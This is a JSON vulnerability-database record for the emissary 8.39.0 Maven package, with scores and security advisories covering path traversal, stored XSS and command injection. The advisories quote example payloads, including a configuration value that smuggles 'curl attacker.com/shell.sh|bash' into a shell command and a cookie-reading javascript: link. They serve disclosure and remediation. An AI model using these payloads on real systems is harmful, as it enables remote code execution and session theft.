{"url":"http://public2.vulnerablecode.io/api/packages/1048895?format=json","purl":"pkg:maven/gov.nsa.emissary/emissary@8.39.0","type":"maven","namespace":"gov.nsa.emissary","name":"emissary","version":"8.39.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"8.43.0","latest_non_vulnerable_version":"8.43.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/349659?format=json","vulnerability_id":"VCID-fgcj-zvq7-e3ea","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35582","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.1679","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.16756","published_at":"2026-04-18T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.18778","published_at":"2026-05-14T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.18681","published_at":"2026-05-12T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.18649","published_at":"2026-05-11T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.18686","published_at":"2026-05-09T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.18584","published_at":"2026-05-07T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.185","published_at":"2026-05-05T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.1867","published_at":"2026-04-26T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.18625","published_at":"2026-04-29T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.1878","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.2168","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35582"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-35582","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-35582"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/commit/1faf33f2494c0128f250d7d2e8f2da99bbd32ae8","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-20T15:48:23Z/"}],"url":"https://github.com/NationalSecurityAgency/emissary/commit/1faf33f2494c0128f250d7d2e8f2da99bbd32ae8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35582","reference_id":"CVE-2026-35582","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35582"},{"reference_url":"https://github.com/advisories/GHSA-3p24-9x7v-7789","reference_id":"GHSA-3p24-9x7v-7789","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3p24-9x7v-7789"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3p24-9x7v-7789","reference_id":"GHSA-3p24-9x7v-7789","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-20T15:48:23Z/"}],"url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3p24-9x7v-7789"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1066771?format=json","purl":"pkg:maven/gov.nsa.emissary/emissary@8.43.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.43.0"}],"aliases":["CVE-2026-35582","GHSA-3p24-9x7v-7789"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fgcj-zvq7-e3ea"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/350507?format=json","vulnerability_id":"VCID-41ah-1nyc-aych","summary":"Emissary has a Path Traversal via Blacklist Bypass in Configuration API\n## Summary\n\nThe configuration API endpoint (`/api/configuration/{name}`) validated\nconfiguration names using a blacklist approach that checked for `\\`, `/`, `..`,\nand trailing `.`. This could potentially be bypassed using URL-encoded variants,\ndouble-encoding, or Unicode normalization to achieve path traversal and read\nconfiguration files outside the intended directory.\n\n## Details\n\n### Vulnerable code — `Configs.java` (line 126)\n\n```java\nprotected static String validate(String config) {\n    if (StringUtils.isBlank(config) || config.contains(\"\\\\\") || config.contains(\"/\")\n        || config.contains(\"..\") || config.endsWith(\".\")) {\n        throw new IllegalArgumentException(\"Invalid config name: \" + config);\n    }\n    return Strings.CS.appendIfMissing(config.trim(), CONFIG_FILE_ENDING);\n}\n```\n\n### Weakness\n\nThe blacklist blocked literal `\\`, `/`, `..`, and trailing `.` but could\npotentially miss:\n\n- URL-encoded variants (`%2e%2e%2f`) if decoded after validation\n- Double-encoded sequences (`%252e%252e%252f`)\n- Unicode normalization bypasses\n- The approach relies on string matching rather than canonical path resolution\n\n### Impact\n\n- Potential read access to configuration files outside the intended config\n  directory\n- Information disclosure of sensitive configuration values\n\n## Remediation\n\nFixed in [PR #1292](https://github.com/NationalSecurityAgency/emissary/pull/1292),\nmerged into release 8.39.0.\n\nThe blacklist was replaced with an allowlist regex that only permits characters\nmatching `^[a-zA-Z0-9._-]+$`:\n\n```java\nprotected static final Pattern VALID_CONFIG_NAME = Pattern.compile(\"^[a-zA-Z0-9._-]+$\");\n\nprotected static String validate(String config) {\n    if (!VALID_CONFIG_NAME.matcher(config).matches() || config.contains(\"..\") || config.endsWith(\".\")) {\n        throw new IllegalArgumentException(\"Invalid config name: \" + config);\n    }\n    return Strings.CS.appendIfMissing(config.trim(), CONFIG_FILE_ENDING);\n}\n```\n\nThis ensures that any character outside the allowed set — including encoded\nslashes, percent signs, and Unicode sequences — is rejected before the config\nname reaches the filesystem.\n\nTests were added to verify that URL-encoded (`%2e%2e%2f`), double-encoded\n(`%252e%252e%252f`), and Unicode (`U+002F`) traversal attempts are blocked.\n\n## Workarounds\n\nIf upgrading is not immediately possible, deploy a reverse proxy or WAF rule\nthat rejects requests to `/api/configuration/` containing encoded path traversal\nsequences.\n\n## References\n\n- [PR #1292 — validate config name with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1292)\n- Original report: GHSA-wjqm-p579-x3ww","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35583","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11568","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11499","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11558","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11534","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15512","published_at":"2026-04-26T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15513","published_at":"2026-04-24T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15473","published_at":"2026-04-21T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15422","published_at":"2026-04-18T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15452","published_at":"2026-04-16T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15526","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15449","published_at":"2026-05-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15327","published_at":"2026-05-05T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15456","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17116","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17028","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.16999","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17033","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17121","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35583"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/pull/1292","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary/pull/1292"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-hxf2-gm22-7vcm","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T16:12:26Z/"}],"url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-hxf2-gm22-7vcm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35583","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35583"},{"reference_url":"https://github.com/advisories/GHSA-hxf2-gm22-7vcm","reference_id":"GHSA-hxf2-gm22-7vcm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hxf2-gm22-7vcm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1048895?format=json","purl":"pkg:maven/gov.nsa.emissary/emissary@8.39.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-fgcj-zvq7-e3ea"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0"}],"aliases":["CVE-2026-35583","GHSA-hxf2-gm22-7vcm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-41ah-1nyc-aych"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/350492?format=json","vulnerability_id":"VCID-d1zn-ry4s-cbff","summary":"Emissary has Stored XSS via Navigation Template Link Injection\n## Summary\n\nMustache navigation templates interpolated configuration-controlled link values\ndirectly into `href` attributes without URL scheme validation. An administrator\nwho could modify the `navItems` configuration could inject `javascript:` URIs,\nenabling stored cross-site scripting (XSS) against other authenticated users\nviewing the Emissary web interface.\n\n## Details\n\n### Vulnerable code — `nav.mustache` (line 10)\n\n```html\n{{#navItems}}\n<li class=\"nav-item\">\n  <a class=\"nav-link\" href=\"{{link}}\">{{display}}</a>\n</li>\n{{/navItems}}\n```\n\nThe `{{link}}` value was rendered without any scheme validation. Mustache's\ndefault HTML escaping protects against injection of new HTML tags but does\n**not** prevent `javascript:` URIs in `href` attributes, since `javascript:`\ncontains no characters that HTML-escaping would alter.\n\n### Attack vector\n\nAn administrator sets a navigation item's link to:\n```\njavascript:alert(document.cookie)\n```\n\nAny authenticated user who clicks the navigation link executes the script in\ntheir browser context.\n\n### Impact\n\n- Session hijacking via cookie theft\n- Actions performed on behalf of the victim user\n- Requires administrative access to modify navigation configuration\n- Requires user interaction (clicking the malicious link)\n\n### Mitigating factors\n\n- Exploitation requires administrative access to modify the `navItems`\n  configuration\n- User interaction (clicking the link) is required\n- The Emissary web interface is typically accessed only by authenticated\n  operators within a trusted network\n\n## Remediation\n\nFixed in [PR #1293](https://github.com/NationalSecurityAgency/emissary/pull/1293),\nmerged into release 8.39.0.\n\n### Server-side link validation — `NavAction.java`\n\nAn allowlist regex was added that only permits `http://`, `https://`, or\nsite-relative (`/`) URLs:\n\n```java\nprivate static final Pattern VALID_LINK = Pattern.compile(\"^(https?:/)?/.*\");\n\nprivate static boolean isValidLink(String link) {\n    if (!VALID_LINK.matcher(link).matches()) {\n        logger.warn(\"Skipping invalid navigation link '{}'\", link);\n        return false;\n    }\n    return true;\n}\n```\n\nInvalid links are logged and silently dropped from the rendered navigation.\n\n### Template hardening — `nav.mustache`\n\nAdded `rel=\"noopener noreferrer\"` to all navigation link anchor tags as a\ndefense-in-depth measure:\n\n```html\n<a class=\"nav-link\" href=\"{{link}}\" rel=\"noopener noreferrer\">{{display}}</a>\n```\n\nTests were added to verify that `javascript:` and `ftp://` URIs are rejected\nwhile `http://`, `https://`, and site-relative (`/path`) links are accepted.\n\n## Workarounds\n\nIf upgrading is not immediately possible, audit the navigation configuration\nto ensure all `navItems` link values use only `http://`, `https://`, or\nrelative (`/`) URL schemes.\n\n## References\n\n- [PR #1293 — validate nav links](https://github.com/NationalSecurityAgency/emissary/pull/1293)\n- Original report: GHSA-wjqm-p579-x3ww","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35571","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.07495","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.07477","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.07489","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.07471","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08173","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08211","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08237","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08076","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08089","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08192","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09184","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.0902","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09107","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10298","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10234","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10211","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.1025","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10307","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35571"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/commit/e2078417464b9004620dde28dcbca2f73ea06c13","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary/commit/e2078417464b9004620dde28dcbca2f73ea06c13"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/pull/1293","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:56:55Z/"}],"url":"https://github.com/NationalSecurityAgency/emissary/pull/1293"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-cpm7-cfpx-3hvp","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:56:55Z/"}],"url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-cpm7-cfpx-3hvp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35571","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35571"},{"reference_url":"https://github.com/advisories/GHSA-cpm7-cfpx-3hvp","reference_id":"GHSA-cpm7-cfpx-3hvp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cpm7-cfpx-3hvp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1048895?format=json","purl":"pkg:maven/gov.nsa.emissary/emissary@8.39.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-fgcj-zvq7-e3ea"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0"}],"aliases":["CVE-2026-35571","GHSA-cpm7-cfpx-3hvp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d1zn-ry4s-cbff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/349879?format=json","vulnerability_id":"VCID-u7m6-swgm-tqf9","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35580","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0295","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.02899","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0292","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.02925","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05162","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05121","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05096","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.04949","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05076","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.0513","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05201","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05152","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05164","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05923","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.0589","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05904","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05905","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05912","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35580"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/pull/1286","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary/pull/1286"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/pull/1288","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary/pull/1288"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35580","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35580"},{"reference_url":"https://github.com/advisories/GHSA-3g6g-gq4r-xjm9","reference_id":"GHSA-3g6g-gq4r-xjm9","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3g6g-gq4r-xjm9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1048895?format=json","purl":"pkg:maven/gov.nsa.emissary/emissary@8.39.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-fgcj-zvq7-e3ea"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0"}],"aliases":["CVE-2026-35580","GHSA-3g6g-gq4r-xjm9"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u7m6-swgm-tqf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/350526?format=json","vulnerability_id":"VCID-vst1-rzvp-9bec","summary":"Emissary has a Command Injection via PLACE_NAME Configuration in Executrix\n## Summary\n\nThe `Executrix` utility class constructed shell commands by concatenating\nconfiguration-derived values — including the `PLACE_NAME` parameter — with\ninsufficient sanitization. Only spaces were replaced with underscores, allowing\nshell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through\ninto `/bin/sh -c` command execution.\n\n## Details\n\n### Vulnerable code — `Executrix.java`\n\n**Insufficient sanitization (line 132):**\n```java\nthis.placeName = this.placeName.replace(' ', '_');\n// ONLY replaces spaces — shell metacharacters pass through\n```\n\n**Shell sink (line 1052–1058):**\n```java\nprotected String[] getTimedCommand(final String c) {\n    return new String[] {\"/bin/sh\", \"-c\", \"ulimit -c 0; cd \" + tmpNames[DIR] + \"; \" + c};\n}\n```\n\n### Data flow\n\n1. `PLACE_NAME` is read from a configuration file\n2. `Executrix` applies only a space-to-underscore replacement\n3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`)\n4. `tmpNames[DIR]` is concatenated into a shell command string\n5. The command is executed via `/bin/sh -c`\n\n### Example payload\n\n```\nPLACE_NAME = \"test;curl attacker.com/shell.sh|bash;x\"\n```\n\nAfter the original sanitization: `test;curl_attacker.com/shell.sh|bash;x`\n(semicolons, pipes, and other metacharacters preserved)\n\n### Impact\n\n- Arbitrary command execution on the Emissary host\n- Requires the ability to control configuration values (e.g., administrative\n  access or a compromised configuration source)\n\n## Remediation\n\nFixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290),\nmerged into release 8.39.0.\n\nThe space-only replacement was replaced with an allowlist regex that strips all\ncharacters not matching `[a-zA-Z0-9_-]`:\n\n```java\nprotected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile(\"[^a-zA-Z0-9_-]\");\n\nprotected static String cleanPlaceName(final String placeName) {\n    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll(\"_\");\n}\n```\n\nThis ensures that any shell metacharacter in the `PLACE_NAME` configuration\nvalue is replaced with an underscore before it can reach a command string.\n\nTests were added to verify that parentheses, slashes, dots, hash, dollar signs,\nbackslashes, quotes, semicolons, carets, and at-signs are all sanitized.\n\n## Workarounds\n\nIf upgrading is not immediately possible, ensure that `PLACE_NAME` values in all\nconfiguration files contain only alphanumeric characters, underscores, and hyphens.\n\n## References\n\n- [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290)\n- Original report: GHSA-wjqm-p579-x3ww","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35581","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.1845","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18398","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18402","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18451","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00077","scoring_system":"epss","scoring_elements":"0.22992","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00077","scoring_system":"epss","scoring_elements":"0.23005","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24965","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24993","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24802","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24727","published_at":"20